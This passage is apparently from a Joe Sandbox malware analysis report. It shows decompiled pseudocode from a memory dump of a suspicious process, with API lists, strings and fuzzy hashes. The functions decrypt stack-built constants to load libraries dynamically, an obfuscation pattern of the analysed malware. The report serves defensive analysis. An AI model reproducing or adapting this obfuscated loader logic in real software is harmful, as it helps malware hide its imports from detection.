				 *((intOrPtr*)(_t163 - 0xc8)) = 0xc680fd1c;
				 *((intOrPtr*)(_t163 - 0xc4)) = 0x2d8c26d6;
				 *((intOrPtr*)(_t163 - 0xc0)) = 0xa880798f;
				 *((intOrPtr*)(_t163 - 0xbc)) = 0x2b922658;
				 *((intOrPtr*)(_t163 - 0xb8)) = 0xea5892d;
				 *((intOrPtr*)(_t163 - 0xb4)) = 0x7097e74b;
				 *((intOrPtr*)(_t163 - 0xb0)) = 0x9e4287c3;
				 *((intOrPtr*)(_t163 - 0xac)) = 0x7ddd092d;
				 *((intOrPtr*)(_t163 - 0xa8)) = 0x9d72876c;
				 *((intOrPtr*)(_t163 - 0xa4)) = 0x687954f0;
				 *((intOrPtr*)(_t163 - 0xa0)) = 0xdc560dfd;
				 *((intOrPtr*)(_t163 - 0x9c)) = 0xc6ae8e76;
				 *((intOrPtr*)(_t163 - 0x98)) = 0x8b8a62f4;
				 *((intOrPtr*)(_t163 - 0x94)) = 0xecb223eb;
				 *((intOrPtr*)(_t163 - 0x90)) = 0x47121692;
				 *((intOrPtr*)(_t163 - 0x8c)) = 0xae2ee0d3;
				 *((intOrPtr*)(_t163 - 0x88)) = 0x4d4e6b59;
				 *((intOrPtr*)(_t163 - 0x84)) = 0x946b4306;
				 *((intOrPtr*)(_t163 - 0x80)) = 0xd476e44b;
				 *((intOrPtr*)(_t163 - 0x7c)) = 0x18a3fb60;
				 *((intOrPtr*)(_t163 - 0x78)) = 0xd6ef19a3;
				 *((intOrPtr*)(_t163 - 0x74)) = 0x15abf441;
				 *((intOrPtr*)(_t163 - 0x70)) = 0xdec4d0c9;
				 *((intOrPtr*)(_t163 - 0x6c)) = 0xd9403070;
				 *((intOrPtr*)(_t163 - 0x68)) = 0x8e8082e4;
				 *((intOrPtr*)(_t163 - 0x64)) = 0x26487421;
				 *((intOrPtr*)(_t163 - 0x60)) = 0x28c9a878;
				 *((intOrPtr*)(_t163 - 0x5c)) = 0x17178755;
				 *((intOrPtr*)(_t163 - 0x58)) = 0xfdb97c74;
				 *((intOrPtr*)(_t163 - 0x54)) = 0x54f28a82;
				 *((intOrPtr*)(_t163 - 0x50)) = 0x84c7bbdf;
				 *((intOrPtr*)(_t163 - 0x4c)) = 0x16f91cc5;
				 *((intOrPtr*)(_t163 - 0x48)) = 0x744cd88f;
				 *((intOrPtr*)(_t163 - 0x44)) = 0x1b61a938;
				 *((intOrPtr*)(_t163 - 0x40)) = 0x4115c6b9;
				 *((intOrPtr*)(_t163 - 0x3c)) = 0x267599c8;
				 *((intOrPtr*)(_t163 - 0x38)) = 0x648ba3c;
				 *((intOrPtr*)(_t163 - 0x34)) = 0xecb540f7;
				 *((intOrPtr*)(_t163 - 0x30)) = 0x89b84a5;
				 *((intOrPtr*)(_t163 - 0x2c)) = 0xb9e63541;
				 *((intOrPtr*)(_t163 - 0x28)) = 0xa1eb4040;
				 *((intOrPtr*)(_t163 - 0x24)) = 0xac5c6894;
				 *((intOrPtr*)(_t163 - 0x20)) = 0x15e21cd3;
				 *((intOrPtr*)(_t163 - 0x1c)) = 0x8a75a34c;
				 *((intOrPtr*)(_t163 - 0x18)) = 0xeec71677;
				 *((intOrPtr*)(_t163 - 0x14)) = 0x86e6e5b0;
				 *((intOrPtr*)(_t163 - 0x10)) = 0xe0065bd7;
				 *((intOrPtr*)(_t163 - 0xc)) = 0x831cc3a0;
				 *((intOrPtr*)(_t163 - 8)) = 0xdfe1953e;
				 *((intOrPtr*)(_t163 - 4)) = 0x6b032933;
				_t161 = L002A1D00(0x2b2ef0, 0x1ac, _t159);
				 *0x2b7c74 = LoadLibraryW(_t161);
				_t152 = HeapFree(GetProcessHeap(), 0, _t161);
				_t156 =  *0x2b7c74;
				_t162 = 0x1f5c6a;
				if( *0x2b7c74 != 0) {
					goto 0x5a167d;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L002A1480(_t154, _t156, _t163 - 0x24c, _t159, _t162);
				} else {
					goto 0x5a166a;
					return _t152;
				}
			}

0x002a6baa
0x002a6bb4
0x002a6bbe
0x002a6bc8
0x002a6bd2
0x002a6bdc
0x002a6be6
0x002a6bf0
0x002a6bfa
0x002a6c04
0x002a6c0e
0x002a6c18
0x002a6c22
0x002a6c2c
0x002a6c36
0x002a6c40
0x002a6c4a
0x002a6c54
0x002a6c5e
0x002a6c68
0x002a6c72
0x002a6c7c
0x002a6c86
0x002a6c90
0x002a6c9a
0x002a6ca4
0x002a6cae
0x002a6cb8
0x002a6cc2
0x002a6ccc
0x002a6cd6
0x002a6ce0
0x002a6cea
0x002a6cf4
0x002a6cfe
0x002a6d08
0x002a6d12
0x002a6d1c
0x002a6d26
0x002a6d30
0x002a6d3a
0x002a6d44
0x002a6d4e
0x002a6d58
0x002a6d62
0x002a6d6c
0x002a6d76
0x002a6d80
0x002a6d8a
0x002a6d94
0x002a6d9e
0x002a6da8
0x002a6db2
0x002a6dbc
0x002a6dc6
0x002a6dd0
0x002a6dda
0x002a6de4
0x002a6dee
0x002a6df8
0x002a6e02
0x002a6e0c
0x002a6e16
0x002a6e20
0x002a6e2a
0x002a6e34
0x002a6e3e
0x002a6e48
0x002a6e52
0x002a6e5c
0x002a6e66
0x002a6e70
0x002a6e7a
0x002a6e84
0x002a6e8e
0x002a6e98
0x002a6ea2
0x002a6eac
0x002a6eb6
0x002a6ec0
0x002a6ed4
0x002a6ee3
0x002a6eed
0x002a6ef7
0x002a6f01
0x002a6f0b
0x002a6f15
0x002a6f1f
0x002a6f29
0x002a6f33
0x002a6f3d
0x002a6f47
0x002a6f51
0x002a6f5b
0x002a6f65
0x002a6f6f
0x002a6f79
0x002a6f83
0x002a6f8d
0x002a6f97
0x002a6fa1
0x002a6fab
0x002a6fb5
0x002a6fbf
0x002a6fc9
0x002a6fd3
0x002a6fdd
0x002a6fe7
0x002a6ff1
0x002a6ffb
0x002a7005
0x002a700f
0x002a7019
0x002a7023
0x002a702d
0x002a7037
0x002a703e
0x002a7045
0x002a704c
0x002a7053
0x002a705a
0x002a7061
0x002a7068
0x002a706f
0x002a7076
0x002a707d
0x002a7084
0x002a708b
0x002a7092
0x002a7099
0x002a70a0
0x002a70a7
0x002a70ae
0x002a70b5
0x002a70bc
0x002a70c3
0x002a70ca
0x002a70d1
0x002a70d8
0x002a70df
0x002a70e6
0x002a70ed
0x002a70f4
0x002a70fb
0x002a7102
0x002a7109
0x002a7110
0x002a711f
0x002a712b
0x002a7137
0x002a713d
0x002a7143
0x002a7146
0x002a714e
0x002a7153
0x002a7154
0x002a7155
0x002a7156
0x002a7157
0x002a7158
0x002a7159
0x002a715a
0x002a715b
0x002a715c
0x002a716e
0x002a7148
0x002a7148
0x002a714d
0x002a714d

APIs

LoadLibraryW.KERNEL32(00000000), ref: 002A7122
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A7130
HeapFree.KERNEL32(00000000), ref: 002A7137

Strings

!tH&, xrefs: 002A7068
{gB, xrefs: 002A6F0B
YkNM, xrefs: 002A7023
91\_, xrefs: 002A6EB6
d4, xrefs: 002A6E8E

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !tH&$91\_$YkNM$d4${gB
API String ID: 872250060-3240151467
Opcode ID: 258e534ba9ef6a55350d0b1c2246e2bb7ee3319bca0d9f4a060b59af594d4f63
Instruction ID: e3e7e4fbc17166b3d25c8e05e464ea92d437e55bd58455a7162983bedb68f199
Opcode Fuzzy Hash: 258e534ba9ef6a55350d0b1c2246e2bb7ee3319bca0d9f4a060b59af594d4f63
Instruction Fuzzy Hash: E2C196B4C463A9CFDB619F829A847DDBA71BB16300F6086C8D5593F314CB750A81CF8A

Uniqueness

Uniqueness Score: 100.00%

Function 002A843A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 195
memorylibraryUNIQUE

C-Code - Quality: 93%

			E002A843A(void* __esi, void* __eflags) {
				int _t180;
				void* _t182;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				 *((intOrPtr*)(_t191 - 0x2bc)) = 0xffb6f3db;
				 *((intOrPtr*)(_t191 - 0x2b8)) = 0x42ee5917;
				 *((intOrPtr*)(_t191 - 0x2b4)) = 0xcb3b48c1;
				 *((intOrPtr*)(_t191 - 0x2b0)) = 0xa6520082;
				 *((intOrPtr*)(_t191 - 0x2ac)) = 0x5978cda3;
				 *((intOrPtr*)(_t191 - 0x2a8)) = 0x8eeb0cef;
				 *((intOrPtr*)(_t191 - 0x2a4)) = 0x7c3c2616;
				 *((intOrPtr*)(_t191 - 0x2a0)) = 0xf9e12a7d;
				 *((intOrPtr*)(_t191 - 0x29c)) = 0xd1129a86;
				 *((intOrPtr*)(_t191 - 0x298)) = 0x19026469;
				 *((intOrPtr*)(_t191 - 0x294)) = 0x81808771;
				 *((intOrPtr*)(_t191 - 0x290)) = 0xb80a64b0;
				 *((intOrPtr*)(_t191 - 0x28c)) = 0x567d0021;
				 *((intOrPtr*)(_t191 - 0x288)) = 0x84daafe4;
				 *((intOrPtr*)(_t191 - 0x284)) = 0x52328f;
				 *((intOrPtr*)(_t191 - 0x280)) = 0x79c5bc63;
				 *((intOrPtr*)(_t191 - 0x27c)) = 0x18ee37f2;
				 *((intOrPtr*)(_t191 - 0x278)) = 0x759352e0;
				 *((intOrPtr*)(_t191 - 0x274)) = 0x972b7044;
				 *((intOrPtr*)(_t191 - 0x270)) = 0xb36a66b1;
				 *((intOrPtr*)(_t191 - 0x26c)) = 0x2522e1d5;
				 *((intOrPtr*)(_t191 - 0x268)) = 0xcaea6a5e;
				 *((intOrPtr*)(_t191 - 0x264)) = 0xaec4e5b9;
				 *((intOrPtr*)(_t191 - 0x260)) = 0x8a5f01fa;
				 *((intOrPtr*)(_t191 - 0x25c)) = 0xbb77f3f7;
				 *((intOrPtr*)(_t191 - 0x258)) = 0x50f1bf85;
				 *((intOrPtr*)(_t191 - 0x254)) = 0xe281bbb7;
				 *((intOrPtr*)(_t191 - 0x250)) = 0x998865c4;
				 *((intOrPtr*)(_t191 - 0x24c)) = 0x62370433;
				 *((intOrPtr*)(_t191 - 0x248)) = 0xa291a2b3;
				 *((intOrPtr*)(_t191 - 0x244)) = 0xbba8d9cf;
				 *((intOrPtr*)(_t191 - 0x240)) = 0x91a70b;
				 *((intOrPtr*)(_t191 - 0x23c)) = 0x9c03d728;
				 *((intOrPtr*)(_t191 - 0x238)) = 0x847a151e;
				 *((intOrPtr*)(_t191 - 0x234)) = 0x2304bff;
				 *((intOrPtr*)(_t191 - 0x230)) = 0xbed58740;
				 *((intOrPtr*)(_t191 - 0x22c)) = 0x1c2240c7;
				 *((intOrPtr*)(_t191 - 0x228)) = 0x12d0bb03;
				 *((intOrPtr*)(_t191 - 0x224)) = 0xe98e44a1;
				 *((intOrPtr*)(_t191 - 0x220)) = 0x7a77d8c4;
				 *((intOrPtr*)(_t191 - 0x21c)) = 0xdcd3285e;
				 *((intOrPtr*)(_t191 - 0x218)) = 0xe0b58a70;
				 *((intOrPtr*)(_t191 - 0x214)) = 0xaf855e10;
				 *((intOrPtr*)(_t191 - 0x210)) = 0x368de6d9;
				 *((intOrPtr*)(_t191 - 0x20c)) = 0x40b905fa;
				 *((intOrPtr*)(_t191 - 0x208)) = 0x74f97d88;
				 *((intOrPtr*)(_t191 - 0x204)) = 0x55b6dcc6;
				 *((intOrPtr*)(_t191 - 0x200)) = 0xb1cc33f;
				 *((intOrPtr*)(_t191 - 0x1fc)) = 0xc3456997;
				 *((intOrPtr*)(_t191 - 0x1f8)) = 0xdd35737e;
				 *((intOrPtr*)(_t191 - 0x1f4)) = 0xb36b92a9;
				 *((intOrPtr*)(_t191 - 0x1f0)) = 0xde8e79a1;
				 *((intOrPtr*)(_t191 - 0x1ec)) = 0xf23453a2;
				 *((intOrPtr*)(_t191 - 0x1e8)) = 0xaaf7674b;
				 *((intOrPtr*)(_t191 - 0x1e4)) = 0x3fd813b0;
				 *((intOrPtr*)(_t191 - 0x1e0)) = 0x60beee96;
				 *((intOrPtr*)(_t191 - 0x1dc)) = 0x9781008e;
				 *((intOrPtr*)(_t191 - 0x1d8)) = 0x4aa3e6d3;
				 *((intOrPtr*)(_t191 - 0x1d4)) = 0x16cff405;
				 *((intOrPtr*)(_t191 - 0x1d0)) = 0xc7cd086c;
				 *((intOrPtr*)(_t191 - 0x1cc)) = 0x7fa1c49;
				 *((intOrPtr*)(_t191 - 0x1c8)) = 0xf2da8f0b;
				 *((intOrPtr*)(_t191 - 0x1c4)) = 0x5a45cf8b;
				 *((intOrPtr*)(_t191 - 0x1c0)) = 0x3a9cda52;
				 *((intOrPtr*)(_t191 - 0x1bc)) = 0x320d7194;
				 *((intOrPtr*)(_t191 - 0x1b8)) = 0x5736192c;
				 *((intOrPtr*)(_t191 - 0x1b4)) = 0xd8ce2db8;
				 *((intOrPtr*)(_t191 - 0x1b0)) = 0x1de4ee69;
				 *((intOrPtr*)(_t191 - 0x1ac)) = 0xe8ae66c8;
				 *((intOrPtr*)(_t191 - 0x1a8)) = 0x2c44325f;
				 *((intOrPtr*)(_t191 - 0x1a4)) = 0xed6ce4a8;
				 *((intOrPtr*)(_t191 - 0x1a0)) = 0x82bd0342;
				 *((intOrPtr*)(_t191 - 0x19c)) = 0x225078dd;
				 *((intOrPtr*)(_t191 - 0x198)) = 0x69abbb87;
				 *((intOrPtr*)(_t191 - 0x194)) = 0xa9d4ed32;
				 *((intOrPtr*)(_t191 - 0x190)) = 0x8050fb55;
				 *((intOrPtr*)(_t191 - 0x18c)) = 0x39db400e;
				 *((intOrPtr*)(_t191 - 0x188)) = 0x11b86bf1;
				 *((intOrPtr*)(_t191 - 0x184)) = 0xff2e0d55;
				 *((intOrPtr*)(_t191 - 0x180)) = 0x905b27a0;
				 *((intOrPtr*)(_t191 - 0x17c)) = 0xa6cc43d0;
				 *((intOrPtr*)(_t191 - 0x178)) = 0x248399f0;
				 *((intOrPtr*)(_t191 - 0x174)) = 0x61fdc396;
				 *((intOrPtr*)(_t191 - 0x170)) = 0x55d41932;
				 *((intOrPtr*)(_t191 - 0x16c)) = 0x3cb6d6d2;
				 *((intOrPtr*)(_t191 - 0x168)) = 0x602f81fc;
				 *((intOrPtr*)(_t191 - 0x164)) = 0x96fe0e2a;
				 *((intOrPtr*)(_t191 - 0x160)) = 0xadb4daa8;
				 *((intOrPtr*)(_t191 - 0x15c)) = 0x4ba1d5c1;
				 *((intOrPtr*)(_t191 - 0x158)) = 0xaeb36b38;
				 *((intOrPtr*)(_t191 - 0x154)) = 0x94d0b9c4;
				 *((intOrPtr*)(_t191 - 0x150)) = 0x442d53bf;
				 *((intOrPtr*)(_t191 - 0x14c)) = 0x3293833a;
				 *((intOrPtr*)(_t191 - 0x148)) = 0xb37bca59;
				 *((intOrPtr*)(_t191 - 0x144)) = 0x8c41f99d;
				 *((intOrPtr*)(_t191 - 0x140)) = 0x7af39d97;
				 *((intOrPtr*)(_t191 - 0x13c)) = 0x6cfa7f9a;
				 *((intOrPtr*)(_t191 - 0x138)) = 0xb2cb25cc;
				 *((intOrPtr*)(_t191 - 0x134)) = 0xb742fb49;
				 *((intOrPtr*)(_t191 - 0x130)) = 0x9e19e072;
				 *((intOrPtr*)(_t191 - 0x12c)) = 0x7435f9d3;
				 *((intOrPtr*)(_t191 - 0x128)) = 0x6151d2d;
				 *((intOrPtr*)(_t191 - 0x124)) = 0xb8c81b4e;
				 *((intOrPtr*)(_t191 - 0x120)) = 0xa0a74801;
				 *((intOrPtr*)(_t191 - 0x11c)) = 0x9254b144;
				 *((intOrPtr*)(_t191 - 0x118)) = 0xbf9a9ef;
				 *((intOrPtr*)(_t191 - 0x114)) = 0x664eea5e;
				 *((intOrPtr*)(_t191 - 0x110)) = 0xef5c68d3;
				 *((intOrPtr*)(_t191 - 0x10c)) = 0x663adb83;
				 *((intOrPtr*)(_t191 - 0x108)) = 0x698be370;
				 *((intOrPtr*)(_t191 - 0x104)) = 0xc6ab9f43;
				 *((intOrPtr*)(_t191 - 0x100)) = 0x2cb41cee;
				 *((intOrPtr*)(_t191 - 0xfc)) = 0x47d7bebb;
				 *((intOrPtr*)(_t191 - 0xf8)) = 0x33a7852f;
				 *((intOrPtr*)(_t191 - 0xf4)) = 0xa1c5614b;
				 *((intOrPtr*)(_t191 - 0xf0)) = 0xa7986281;
				 *((intOrPtr*)(_t191 - 0xec)) = 0xd5f1e78;
				 *((intOrPtr*)(_t191 - 0xe8)) = 0x394359d2;
				 *((intOrPtr*)(_t191 - 0xe4)) = 0x63aa5408;
				 *((intOrPtr*)(_t191 - 0xe0)) = 0x882305a9;
				 *((intOrPtr*)(_t191 - 0xdc)) = 0x4db9286a;
				 *((intOrPtr*)(_t191 - 0xd8)) = 0x628bddce;
				 *((intOrPtr*)(_t191 - 0xd4)) = 0x711914d8;
				 *((intOrPtr*)(_t191 - 0xd0)) = 0x69e7934f;
				 *((intOrPtr*)(_t191 - 0xcc)) = 0x38cb7c62;
				 *((intOrPtr*)(_t191 - 0xc8)) = 0xff47d5d8;
				 *((intOrPtr*)(_t191 - 0xc4)) = 0xe66607e0;
				 *((intOrPtr*)(_t191 - 0xc0)) = 0xffbe9a31;
				 *((intOrPtr*)(_t191 - 0xbc)) = 0xde0936dc;
				 *((intOrPtr*)(_t191 - 0xb8)) = 0xeeb91249;
				 *((intOrPtr*)(_t191 - 0xb4)) = 0x9a91cfec;
				 *((intOrPtr*)(_t191 - 0xb0)) = 0xd97b090f;
				 *((intOrPtr*)(_t191 - 0xac)) = 0x79e7a3b3;
				 *((intOrPtr*)(_t191 - 0xa8)) = 0xbf85e88a;
				 *((intOrPtr*)(_t191 - 0xa4)) = 0xd17b9713;
				 *((intOrPtr*)(_t191 - 0xa0)) = 0xb4a963a5;
				 *((intOrPtr*)(_t191 - 0x9c)) = 0x4e9dab1f;
				 *((intOrPtr*)(_t191 - 0x98)) = 0x26103dda;
				 *((intOrPtr*)(_t191 - 0x94)) = 0xcb4184e7;
				 *((intOrPtr*)(_t191 - 0x90)) = 0x29b9d4c3;
				 *((intOrPtr*)(_t191 - 0x8c)) = 0xb84826d1;
				 *((intOrPtr*)(_t191 - 0x88)) = 0x6691dcdb;
				 *((intOrPtr*)(_t191 - 0x84)) = 0xe77f285d;
				 *((intOrPtr*)(_t191 - 0x80)) = 0x63d37a01;
				 *((intOrPtr*)(_t191 - 0x7c)) = 0x9e07cefa;
				 *((intOrPtr*)(_t191 - 0x78)) = 0x8e456f03;
				 *((intOrPtr*)(_t191 - 0x74)) = 0xb191b1bc;
				 *((intOrPtr*)(_t191 - 0x70)) = 0xcdf1ff21;
				 *((intOrPtr*)(_t191 - 0x6c)) = 0xd53f95c1;
				 *((intOrPtr*)(_t191 - 0x68)) = 0xaed19769;
				 *((intOrPtr*)(_t191 - 0x64)) = 0x515166c1;
				 *((intOrPtr*)(_t191 - 0x60)) = 0xc4604900;
				 *((intOrPtr*)(_t191 - 0x5c)) = 0x7177c0f;
				 *((intOrPtr*)(_t191 - 0x58)) = 0xd6b03116;
				 *((intOrPtr*)(_t191 - 0x54)) = 0x48b81b3c;
				 *((intOrPtr*)(_t191 - 0x50)) = 0x7655b9b3;
				 *((intOrPtr*)(_t191 - 0x4c)) = 0x4c63c822;
				 *((intOrPtr*)(_t191 - 0x48)) = 0xdca9b450;
				 *((intOrPtr*)(_t191 - 0x44)) = 0x6562079a;
				 *((intOrPtr*)(_t191 - 0x40)) = 0xa503842e;
				 *((intOrPtr*)(_t191 - 0x3c)) = 0x97063634;
				 *((intOrPtr*)(_t191 - 0x38)) = 0xc165b32d;
				 *((intOrPtr*)(_t191 - 0x34)) = 0xbf230fad;
				 *((intOrPtr*)(_t191 - 0x30)) = 0x9b847890;
				 *((intOrPtr*)(_t191 - 0x2c)) = 0xa38ce9b0;
				 *((intOrPtr*)(_t191 - 0x28)) = 0xbae45a57;
				 *((intOrPtr*)(_t191 - 0x24)) = 0x39c26e65;
				 *((intOrPtr*)(_t191 - 0x20)) = 0x80e13151;
				 *((intOrPtr*)(_t191 - 0x1c)) = 0x4144edc3;
				 *((intOrPtr*)(_t191 - 0x18)) = 0xe2df436;
				 *((intOrPtr*)(_t191 - 0x14)) = 0x427bdf71;
				 *((intOrPtr*)(_t191 - 0x10)) = 0x8f267d87;
				 *((intOrPtr*)(_t191 - 0xc)) = 0x4d61d3e0;
				 *((intOrPtr*)(_t191 - 8)) = 0x6121230c;
				 *((intOrPtr*)(_t191 - 4)) = 0x766caa2a;
				_t189 = L002A1D00(0x2b3930, 0x1f0, _t187);
				 *0x2b7c80 = LoadLibraryW(_t189);
				_t180 = HeapFree(GetProcessHeap(), 0, _t189);
				_t184 =  *0x2b7c80;
				_t190 = 0x1f5c6a;
				if( *0x2b7c80 != 0) {
					goto 0x5a175c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L002A1480(_t182, _t184, _t191 - 0x2bc, _t187, _t190);
				} else {
					goto 0x5a1749;
					return _t180;
				}
			}

0x002a843a
0x002a8444
0x002a844e
0x002a8458
0x002a8462
0x002a846c
0x002a8476
0x002a8480
0x002a848a
0x002a8494
0x002a849e
0x002a84a8
0x002a84b2
0x002a84bc
0x002a84c6
0x002a84d0
0x002a84da
0x002a84e4
0x002a84ee
0x002a84f8
0x002a8502
0x002a850c
0x002a8516
0x002a8520
0x002a852a
0x002a8534
0x002a853e
0x002a8548
0x002a8552
0x002a855c
0x002a8566
0x002a8570
0x002a857a
0x002a8584
0x002a858e
0x002a8598
0x002a85a2
0x002a85ac
0x002a85b6
0x002a85c0
0x002a85ca
0x002a85d4
0x002a85de
0x002a85e8
0x002a85f2
0x002a85fc
0x002a8606
0x002a8610
0x002a861a
0x002a8624
0x002a862e
0x002a8638
0x002a8642
0x002a864c
0x002a8656
0x002a8660
0x002a866a
0x002a8674
0x002a867e
0x002a8688
0x002a8692
0x002a869c
0x002a86a6
0x002a86b0
0x002a86ba
0x002a86c4
0x002a86ce
0x002a86d8
0x002a86e2
0x002a86ec
0x002a86f6
0x002a8700
0x002a870a
0x002a8714
0x002a871e
0x002a8728
0x002a8732
0x002a873c
0x002a8746
0x002a8750
0x002a875a
0x002a8764
0x002a876e
0x002a8778
0x002a8782
0x002a878c
0x002a8796
0x002a87a0
0x002a87aa
0x002a87b4
0x002a87be
0x002a87c8
0x002a87d2
0x002a87dc
0x002a87e6
0x002a87f0
0x002a87fa
0x002a8804
0x002a880e
0x002a8818
0x002a8822
0x002a882c
0x002a8836
0x002a8840
0x002a884a
0x002a8854
0x002a885e
0x002a8868
0x002a8872
0x002a887c
0x002a8886
0x002a8890
0x002a889a
0x002a88a4
0x002a88ae
0x002a88b8
0x002a88c2
0x002a88cc
0x002a88d6
0x002a88e0
0x002a88ea
0x002a88f4
0x002a88fe
0x002a8908
0x002a8912
0x002a891c
0x002a8926
0x002a8930
0x002a893a
0x002a8944
0x002a894e
0x002a8958
0x002a8962
0x002a896c
0x002a8976
0x002a8980
0x002a898a
0x002a8994
0x002a899e
0x002a89a8
0x002a89b2
0x002a89bc
0x002a89c6
0x002a89d0
0x002a89d7
0x002a89de
0x002a89e5
0x002a89ec
0x002a89f3
0x002a89fa
0x002a8a01
0x002a8a08
0x002a8a0f
0x002a8a16
0x002a8a1d
0x002a8a24
0x002a8a2b
0x002a8a32
0x002a8a39
0x002a8a40
0x002a8a47
0x002a8a58
0x002a8a64
0x002a8a6b
0x002a8a72
0x002a8a79
0x002a8a80
0x002a8a87
0x002a8a8e
0x002a8a95
0x002a8a9c
0x002a8aa3
0x002a8aaa
0x002a8ab1
0x002a8ab8
0x002a8ac7
0x002a8ad3
0x002a8adf
0x002a8ae5
0x002a8aeb
0x002a8aee
0x002a8af6
0x002a8afb
0x002a8afc
0x002a8afd
0x002a8afe
0x002a8aff
0x002a8b00
0x002a8b01
0x002a8b02
0x002a8b03
0x002a8b04
0x002a8b16
0x002a8af0
0x002a8af0
0x002a8af5
0x002a8af5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 002A8ACA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A8AD8
HeapFree.KERNEL32(00000000), ref: 002A8ADF

Strings

^Nf, xrefs: 002A885E
09+, xrefs: 002A8A5F
!, xrefs: 002A84B2
_2D,, xrefs: 002A86EC

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !$09+$^Nf$_2D,
API String ID: 872250060-4292411041
Opcode ID: 7aa81f952b2f393eced2470dfb1ce6addc4765c36c7e83c738a4a5d0eb904b60
Instruction ID: 43691bf2f613d637b47240e0ddf04fef3c1414f9d84d4cd2e8279614fc5d7e98
Opcode Fuzzy Hash: 7aa81f952b2f393eced2470dfb1ce6addc4765c36c7e83c738a4a5d0eb904b60
Instruction Fuzzy Hash: 3DE1A6B4C1A36DCBDB60DF829A997CDBB70BB16304F6086C9C5993A314CB750A85CF85

Uniqueness

Uniqueness Score: 100.00%

Function 002ACEB7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57memoryCOMMON

APIs

_snwprintf.NTDLL ref: 002ACED3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002ACEDF
HeapFree.KERNEL32(00000000), ref: 002ACEE6
memset.NTDLL ref: 002ACEF4
GetModuleHandleW.KERNEL32(00000000), ref: 002ACF1D
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 002ACF3D

Strings

0, xrefs: 002ACEFD

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: HandleHeapModule$FreeProcess_snwprintfmemset
String ID: 0
API String ID: 3347792686-4108050209
Opcode ID: 034fa5e28023bbd1ccd2203009f2e2f9c93caf0026b6e5891689b15b6ad0157b
Instruction ID: 4a7837064358cd17508a716ddab11d2e058f3b91dc7343762b913cd235cb0327
Opcode Fuzzy Hash: 034fa5e28023bbd1ccd2203009f2e2f9c93caf0026b6e5891689b15b6ad0157b
Instruction Fuzzy Hash: 9A115175950614FBE7209B90EC0DFAE7B78FB04741F240116FB0ABA1C0DB746114CB69

Uniqueness

Uniqueness Score: 7.75%

Function 002A24E9, Relevance: 12.1, APIs: 8, Instructions: 59
memorystringCOMMON

C-Code - Quality: 30%

			E002A24E9(void* __ebx, int __edi, intOrPtr* __esi) {
				int _t20;
				short* _t23;
				void* _t24;
				void* _t39;
				void* _t42;
				void* _t43;
				long* _t44;
				int _t46;
				signed int _t48;
				intOrPtr* _t49;
				void* _t51;
				long _t52;
				WCHAR* _t54;
				void* _t55;

				_t49 = __esi;
				_t46 = __edi;
				_t39 = __ebx;
				do {
					_t1 = _t49 + 4; // 0x4
					_t20 = lstrlenW(_t1);
					_t49 =  *_t49;
					_t39 = _t39 + 1 + _t20;
				} while (_t49 != 0);
				_t23 = RtlAllocateHeap(GetProcessHeap(), 8, _t39 + _t39);
				 *(_t55 - 4) = _t23;
				if(_t23 == 0) {
					_t46 =  *(_t55 - 0xc);
				} else {
					_t42 =  *(_t55 - 8);
					while(_t42 != 0) {
						_t5 = _t42 + 4; // 0x4
						_t54 = _t5;
						lstrcpyW( &(_t23[_t46]), _t54);
						_t48 = _t46 + lstrlenW(_t54);
						_t23 =  *(_t55 - 4);
						_t23[_t48] = 0x2c;
						_t46 = _t48 + 1;
						_t42 =  *_t42;
					}
					_t43 = 0;
					_t52 = WideCharToMultiByte(0xfde9, 0, _t23, _t46, 0, 0, 0, 0);
					 *(_t55 - 0x14) = _t52;
					if(_t52 != 0) {
						_t43 = RtlAllocateHeap(GetProcessHeap(), 8, _t52);
						if(_t43 == 0) {
							goto L10;
						} else {
							goto 0x5a0916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t44 =  *(_t55 - 0x10);
							if(_t44 != 0) {
								 *_t44 =  *(_t55 - 0x14);
							}
						}
					}
					goto 0x5a0936;
					asm("int3");
					 *_t46 = _t43;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t24 =  *(_t55 - 8);
				if(_t24 != 0) {
					do {
						_t51 =  *_t24;
						HeapFree(GetProcessHeap(), 0, _t24);
						_t24 = _t51;
					} while (_t51 != 0);
				}
				return 0 |  *_t46 != 0x00000000;
			}

0x002a24e9
0x002a24e9
0x002a24e9
0x002a24f0
